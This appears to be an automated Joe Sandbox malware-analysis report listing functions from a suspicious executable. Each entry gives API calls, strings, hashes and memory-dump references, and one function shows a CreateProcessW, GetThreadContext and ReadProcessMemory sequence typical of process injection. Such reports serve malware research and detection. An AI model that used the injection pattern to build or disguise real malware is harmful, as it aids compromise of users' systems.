Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 39c7c643c4bad3e3f44a811c2efd3ba1a47194f8a272170eab879b59d9d7ed8f
Instruction ID: 83b8e37d228e8c6ecc264d487ce41b7155355c5c4462a2f2482eeaa813947855
Opcode Fuzzy Hash: 39c7c643c4bad3e3f44a811c2efd3ba1a47194f8a272170eab879b59d9d7ed8f
Instruction Fuzzy Hash: 7F110375611218FADB208F64DC84EAABBB8EF04740F11856AB905D7210E6759E509BA2

Function 014F12A0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 014F1ACD
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 014F1AF1
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 014F1B13

Memory Dump Source

Source File: 00000001.00000002.1345357015.00000000014F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_14f0000_YPSvIjQCzd.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
Instruction ID: 9cabc43cd983a774c0fc5bffd83d196c8e3f72f5d5e705cdd3bc61cb61e3c111
Opcode Fuzzy Hash: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
Instruction Fuzzy Hash: 5362F830A14258DBEB24CFA4C850BDEB772EF58700F1091A9D20DEB3A4E7759E81CB59

Function 008397E5 Relevance: 6.2, APIs: 4, Instructions: 155COMMON

Download Yara Rule

APIs

Part of subcall function 007D5045: _fseek.LIBCMT ref: 007D505D

Part of subcall function 008399BE: _wcscmp.LIBCMT ref: 00839AAE
Part of subcall function 008399BE: _wcscmp.LIBCMT ref: 00839AC1

_free.LIBCMT ref: 0083992C
_free.LIBCMT ref: 00839933
_free.LIBCMT ref: 0083999E

Part of subcall function 007F2F95: RtlFreeHeap.NTDLL(00000000,00000000,?,007F9C64), ref: 007F2FA9
Part of subcall function 007F2F95: GetLastError.KERNEL32(00000000,?,007F9C64), ref: 007F2FBB

_free.LIBCMT ref: 008399A6

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID:
API String ID: 1552873950-0
Opcode ID: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
Instruction ID: 5d42b4cd702b78e3c17bde3581b4027c5e736086d3e9bb4f6dba87daba3f5f57
Opcode Fuzzy Hash: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
Instruction Fuzzy Hash: B3515CB1904218EFDF249F64CC85AAEBBB9FF48310F1004AEF649A7341DB755A808F59

Function 007F493A Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 007F49D0
__flush.LIBCMT ref: 007F49F0
__write.LIBCMT ref: 007F4A23
__flsbuf.LIBCMT ref: 007F4A51

Part of subcall function 007F8D68: __getptd_noexit.LIBCMT ref: 007F8D68

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
Instruction ID: 72f2eadcacc30f7f66cb9a325f5599c72dbede132baa2b82b884136aec130cc2
Opcode Fuzzy Hash: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
Instruction Fuzzy Hash: 7E41C57170060EEBDB28CE69C88497F77AAEF80360B24C13DEA55C7750DB78AD408B44

Function 007D73E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0080EE62
758ED0D0.COMDLG32(?), ref: 0080EEAC

Part of subcall function 007D48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007D48A1,?,?,007D37C0,?), ref: 007D48CE

Part of subcall function 007F09D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 007F09F4

Strings

X, xrefs: 0080EE7A

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: NamePath$FullLong_memset
String ID: X
API String ID: 3051022977-3081909835
Opcode ID: 69212f9c04f0fc4cf4c1302188ba97375d817e79149242f5771f3a067f7100de
Instruction ID: 7726074a7ccb5b5ad9ad55654b330b91acfc8ab692181b42dd53c44355ae81ae
Opcode Fuzzy Hash: 69212f9c04f0fc4cf4c1302188ba97375d817e79149242f5771f3a067f7100de
Instruction Fuzzy Hash: 7D21A471A0025C9BCB45DF94CC49BEE7BF9AF49310F04401AE508E7381EBB85949CF91

Function 0083901B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00839036
__fread_nolock.LIBCMT ref: 0083904B

Strings

EA06, xrefs: 0083907D

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: __fread_nolock_memmove
String ID: EA06
API String ID: 1988441806-3962188686
Opcode ID: 9736582deb935c0d39d4eb3e4f9553d80f4ef5d9c2bbcc57155912d0bd6797a9
Instruction ID: ff5f69f48871adf73c88e217b88fc9bca05307e4ae1d75dae466da2ed68b1051
Opcode Fuzzy Hash: 9736582deb935c0d39d4eb3e4f9553d80f4ef5d9c2bbcc57155912d0bd6797a9
Instruction Fuzzy Hash: 4701BE7190465CAEDB28C6A8C85AEFE7BF8DB15311F00415AF652D2281D5B9A61487A0

Function 007F0FF6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 007F594C: __FF_MSGBANNER.LIBCMT ref: 007F5963
Part of subcall function 007F594C: __NMSG_WRITE.LIBCMT ref: 007F596A
Part of subcall function 007F594C: RtlAllocateHeap.NTDLL(01620000,00000000,00000001), ref: 007F598F

std::exception::exception.LIBCMT ref: 007F102C
__CxxThrowException@8.LIBCMT ref: 007F1041

Part of subcall function 007F87DB: RaiseException.KERNEL32(?,?,00000000,0088BAF8,?,00000001,?,?,?,007F1046,00000000,0088BAF8,007D9FEC,00000001), ref: 007F8830

Strings

bad allocation, xrefs: 007F1021

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID: bad allocation
API String ID: 3902256705-2104205924
Opcode ID: af720e8e72664e1694b513c25049658a000498dc32e665a35d2a429f2b4c30fc
Instruction ID: 67d11885e1ce04957645a1ae5e9f001a71320f04fd8033c57cf1595756b22db6
Opcode Fuzzy Hash: af720e8e72664e1694b513c25049658a000498dc32e665a35d2a429f2b4c30fc
Instruction Fuzzy Hash: E3F0A93550061DE6CB24BB94DC09AFF77A8EF00351F500455FB04D6752DFB99A9486E1

Function 00839B6D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 00839B82
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00839B99

Strings

aut, xrefs: 00839B93

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: bb978f6ba5ecc8d773278e2a2f970679e72b57e0bccb2a530942281b8a636e96
Instruction ID: 95904b0fe3d2e70051ed23702be346b16dc0c7f98ec77b7c9bd6207de4c89308
Opcode Fuzzy Hash: bb978f6ba5ecc8d773278e2a2f970679e72b57e0bccb2a530942281b8a636e96
Instruction Fuzzy Hash: F5D05EB954030DABDB10AB90DC0EF9A772CFB04702F0042A1BF64D61A2DEB855988B96

Function 0084CDF1 Relevance: 4.9, APIs: 3, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bbcabcb6ac04f53b43f1511319207fda1e5ddb61b6092860d80dde7813e2ae5
Instruction ID: 2eb4f3cca28b918793e9285db43594524be784c58e92a2af808569f911222e1c
Opcode Fuzzy Hash: 5bbcabcb6ac04f53b43f1511319207fda1e5ddb61b6092860d80dde7813e2ae5
Instruction Fuzzy Hash: D6F14471A083159FCB14DF28C484A6ABBE5FF88314F14892EF8999B352D774E945CF82

Function 007DF8CF Relevance: 4.7, APIs: 3, Instructions: 168comCOMMON

Download Yara Rule

APIs

Part of subcall function 007F03A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 007F03D3
Part of subcall function 007F03A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 007F03DB
Part of subcall function 007F03A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 007F03E6
Part of subcall function 007F03A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 007F03F1
Part of subcall function 007F03A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 007F03F9
Part of subcall function 007F03A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 007F0401

Part of subcall function 007E6259: RegisterClipboardFormatW.USER32(WM_GETCONTROLNAME), ref: 007E62B4

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 007DFB2D
OleInitialize.OLE32(00000000), ref: 007DFBAA
CloseHandle.KERNEL32(00000000), ref: 008149F2

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: Virtual$Handle$ClipboardCloseFormatInitializeRegister
String ID:
API String ID: 3094916012-0
Opcode ID: 7ff597cda8d32f5f60fbed75b535934bf81fafdddfe0034df6cca18f9fcf5aea
Instruction ID: 869f21e87a0c4f73796be8df24d61c99e9e98ca2e060558d5c2cc24a93494180
Opcode Fuzzy Hash: 7ff597cda8d32f5f60fbed75b535934bf81fafdddfe0034df6cca18f9fcf5aea
Instruction Fuzzy Hash: 2B81C8B0905240DEC784FFBAE9596157BE4FB9831871C822BD219C7362FB394428CF99

Function 007D43DB Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 007D4401
Shell_NotifyIconW.SHELL32(00000000,?), ref: 007D44A6
Shell_NotifyIconW.SHELL32(00000001,?), ref: 007D44C3

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: IconNotifyShell_$_memset
String ID:
API String ID: 1505330794-0
Opcode ID: 5aa3ac58ae2ace2163ff8127df6566f5edba9aed2dab54508a2aba173f3a4f9c
Instruction ID: 110e15d58139481faeae77bc24ff68460cae606e9d9535fba7095a10a1787de5
Opcode Fuzzy Hash: 5aa3ac58ae2ace2163ff8127df6566f5edba9aed2dab54508a2aba173f3a4f9c
Instruction Fuzzy Hash: B2315EB05047418FD720EF64D884A9BBBF8FB48304F04092FE59A83391E779A984CB92

Function 007F594C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 007F5963

Part of subcall function 007FA3AB: __NMSG_WRITE.LIBCMT ref: 007FA3D2
Part of subcall function 007FA3AB: __NMSG_WRITE.LIBCMT ref: 007FA3DC

__NMSG_WRITE.LIBCMT ref: 007F596A

Part of subcall function 007FA408: GetModuleFileNameW.KERNEL32(00000000,008943BA,00000104,00000000,00000001,00000000), ref: 007FA49A
Part of subcall function 007FA408: ___crtMessageBoxW.LIBCMT ref: 007FA548

Part of subcall function 007F32DF: ___crtCorExitProcess.LIBCMT ref: 007F32E5
Part of subcall function 007F32DF: ExitProcess.KERNEL32 ref: 007F32EE

Part of subcall function 007F8D68: __getptd_noexit.LIBCMT ref: 007F8D68

RtlAllocateHeap.NTDLL(01620000,00000000,00000001), ref: 007F598F

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: ccdd70eb318482171635ff39c9b9df25f8f6d6f4fc97a185ed84436f15566cd5
Instruction ID: 5c469a8f78835e889a3f6181d833cb86b53274c35bba672727f7370420326670
Opcode Fuzzy Hash: ccdd70eb318482171635ff39c9b9df25f8f6d6f4fc97a185ed84436f15566cd5
Instruction Fuzzy Hash: F901D631300B1DEED629B774D849A3D7348AF41731F50012AF705973C2DABCAD014661

Function 00839B2C Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,008397D2,?,?,?,?,?,00000004), ref: 00839B45
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,008397D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00839B5B
CloseHandle.KERNEL32(00000000,?,008397D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00839B62

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: 01e399b4be83fc63e1e9c35d8bb3c12023f4e40f2840642a511e02da9bef1c38
Instruction ID: cca33d7d0452c5f318c8bff302ac54b1b731ea040efaef85610e9fcbbf6ab50b
Opcode Fuzzy Hash: 01e399b4be83fc63e1e9c35d8bb3c12023f4e40f2840642a511e02da9bef1c38
Instruction Fuzzy Hash: EEE08632181724B7E7222B54EC09FCA7B18FB05772F104120FB54A90E187B525119798

Function 00838F97 Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00838FA5

Part of subcall function 007F2F95: RtlFreeHeap.NTDLL(00000000,00000000,?,007F9C64), ref: 007F2FA9
Part of subcall function 007F2F95: GetLastError.KERNEL32(00000000,?,007F9C64), ref: 007F2FBB

_free.LIBCMT ref: 00838FB6
_free.LIBCMT ref: 00838FC8

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
Instruction ID: d5610e7541e2e298a9f4a678f4704f94ee8f344406ca8e45878b55cc607319a4
Opcode Fuzzy Hash: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
Instruction Fuzzy Hash: 08E012A1619705CACA24A578AD44AA367FEAF88350B28081DB509DB243DE28E8428564

Function 007DAB23 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON

Download Yara Rule

Strings

CALL, xrefs: 0081002B

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID:
String ID: CALL
API String ID: 0-4196123274
Opcode ID: 4089b228aceb69f06eb148adde73e8347a14d8822c69f7cc4475c84edf7152f9
Instruction ID: a15b43c205b91b91df51e12d53ef345005237243976e20fc0f96abe063b121d4
Opcode Fuzzy Hash: 4089b228aceb69f06eb148adde73e8347a14d8822c69f7cc4475c84edf7152f9
Instruction Fuzzy Hash: 33222770608241DFC724DF14C494A6ABBF1FF84304F15895EE99A8B362D779ED85CB82

Function 007D4DD0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 007D4E1A

Strings

EA06, xrefs: 0080DCF5

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: _memmove
String ID: EA06
API String ID: 4104443479-3962188686
Opcode ID: 908b18a193518524575a6c77efef45f88738631dccb7f4ee5be5a0ae361cca99
Instruction ID: 56662c819bb81161708e85d6c8b39d98b52510659f6d022fe1cd3de41daaaf45
Opcode Fuzzy Hash: 908b18a193518524575a6c77efef45f88738631dccb7f4ee5be5a0ae361cca99
Instruction Fuzzy Hash: FA415A61A04298BBDF219B64CC957BE7FB6AF45300F684067E882DB386C67D9D4087E1

Function 007D492E Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

74E4C8D0.UXTHEME ref: 007D4992

Part of subcall function 007F35AC: __lock.LIBCMT ref: 007F35B2
Part of subcall function 007F35AC: RtlDecodePointer.NTDLL(00000001), ref: 007F35BE
Part of subcall function 007F35AC: RtlEncodePointer.NTDLL(?), ref: 007F35C9

Part of subcall function 007D4A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 007D4A73
Part of subcall function 007D4A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 007D4A88

Part of subcall function 007D3B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 007D3B7A
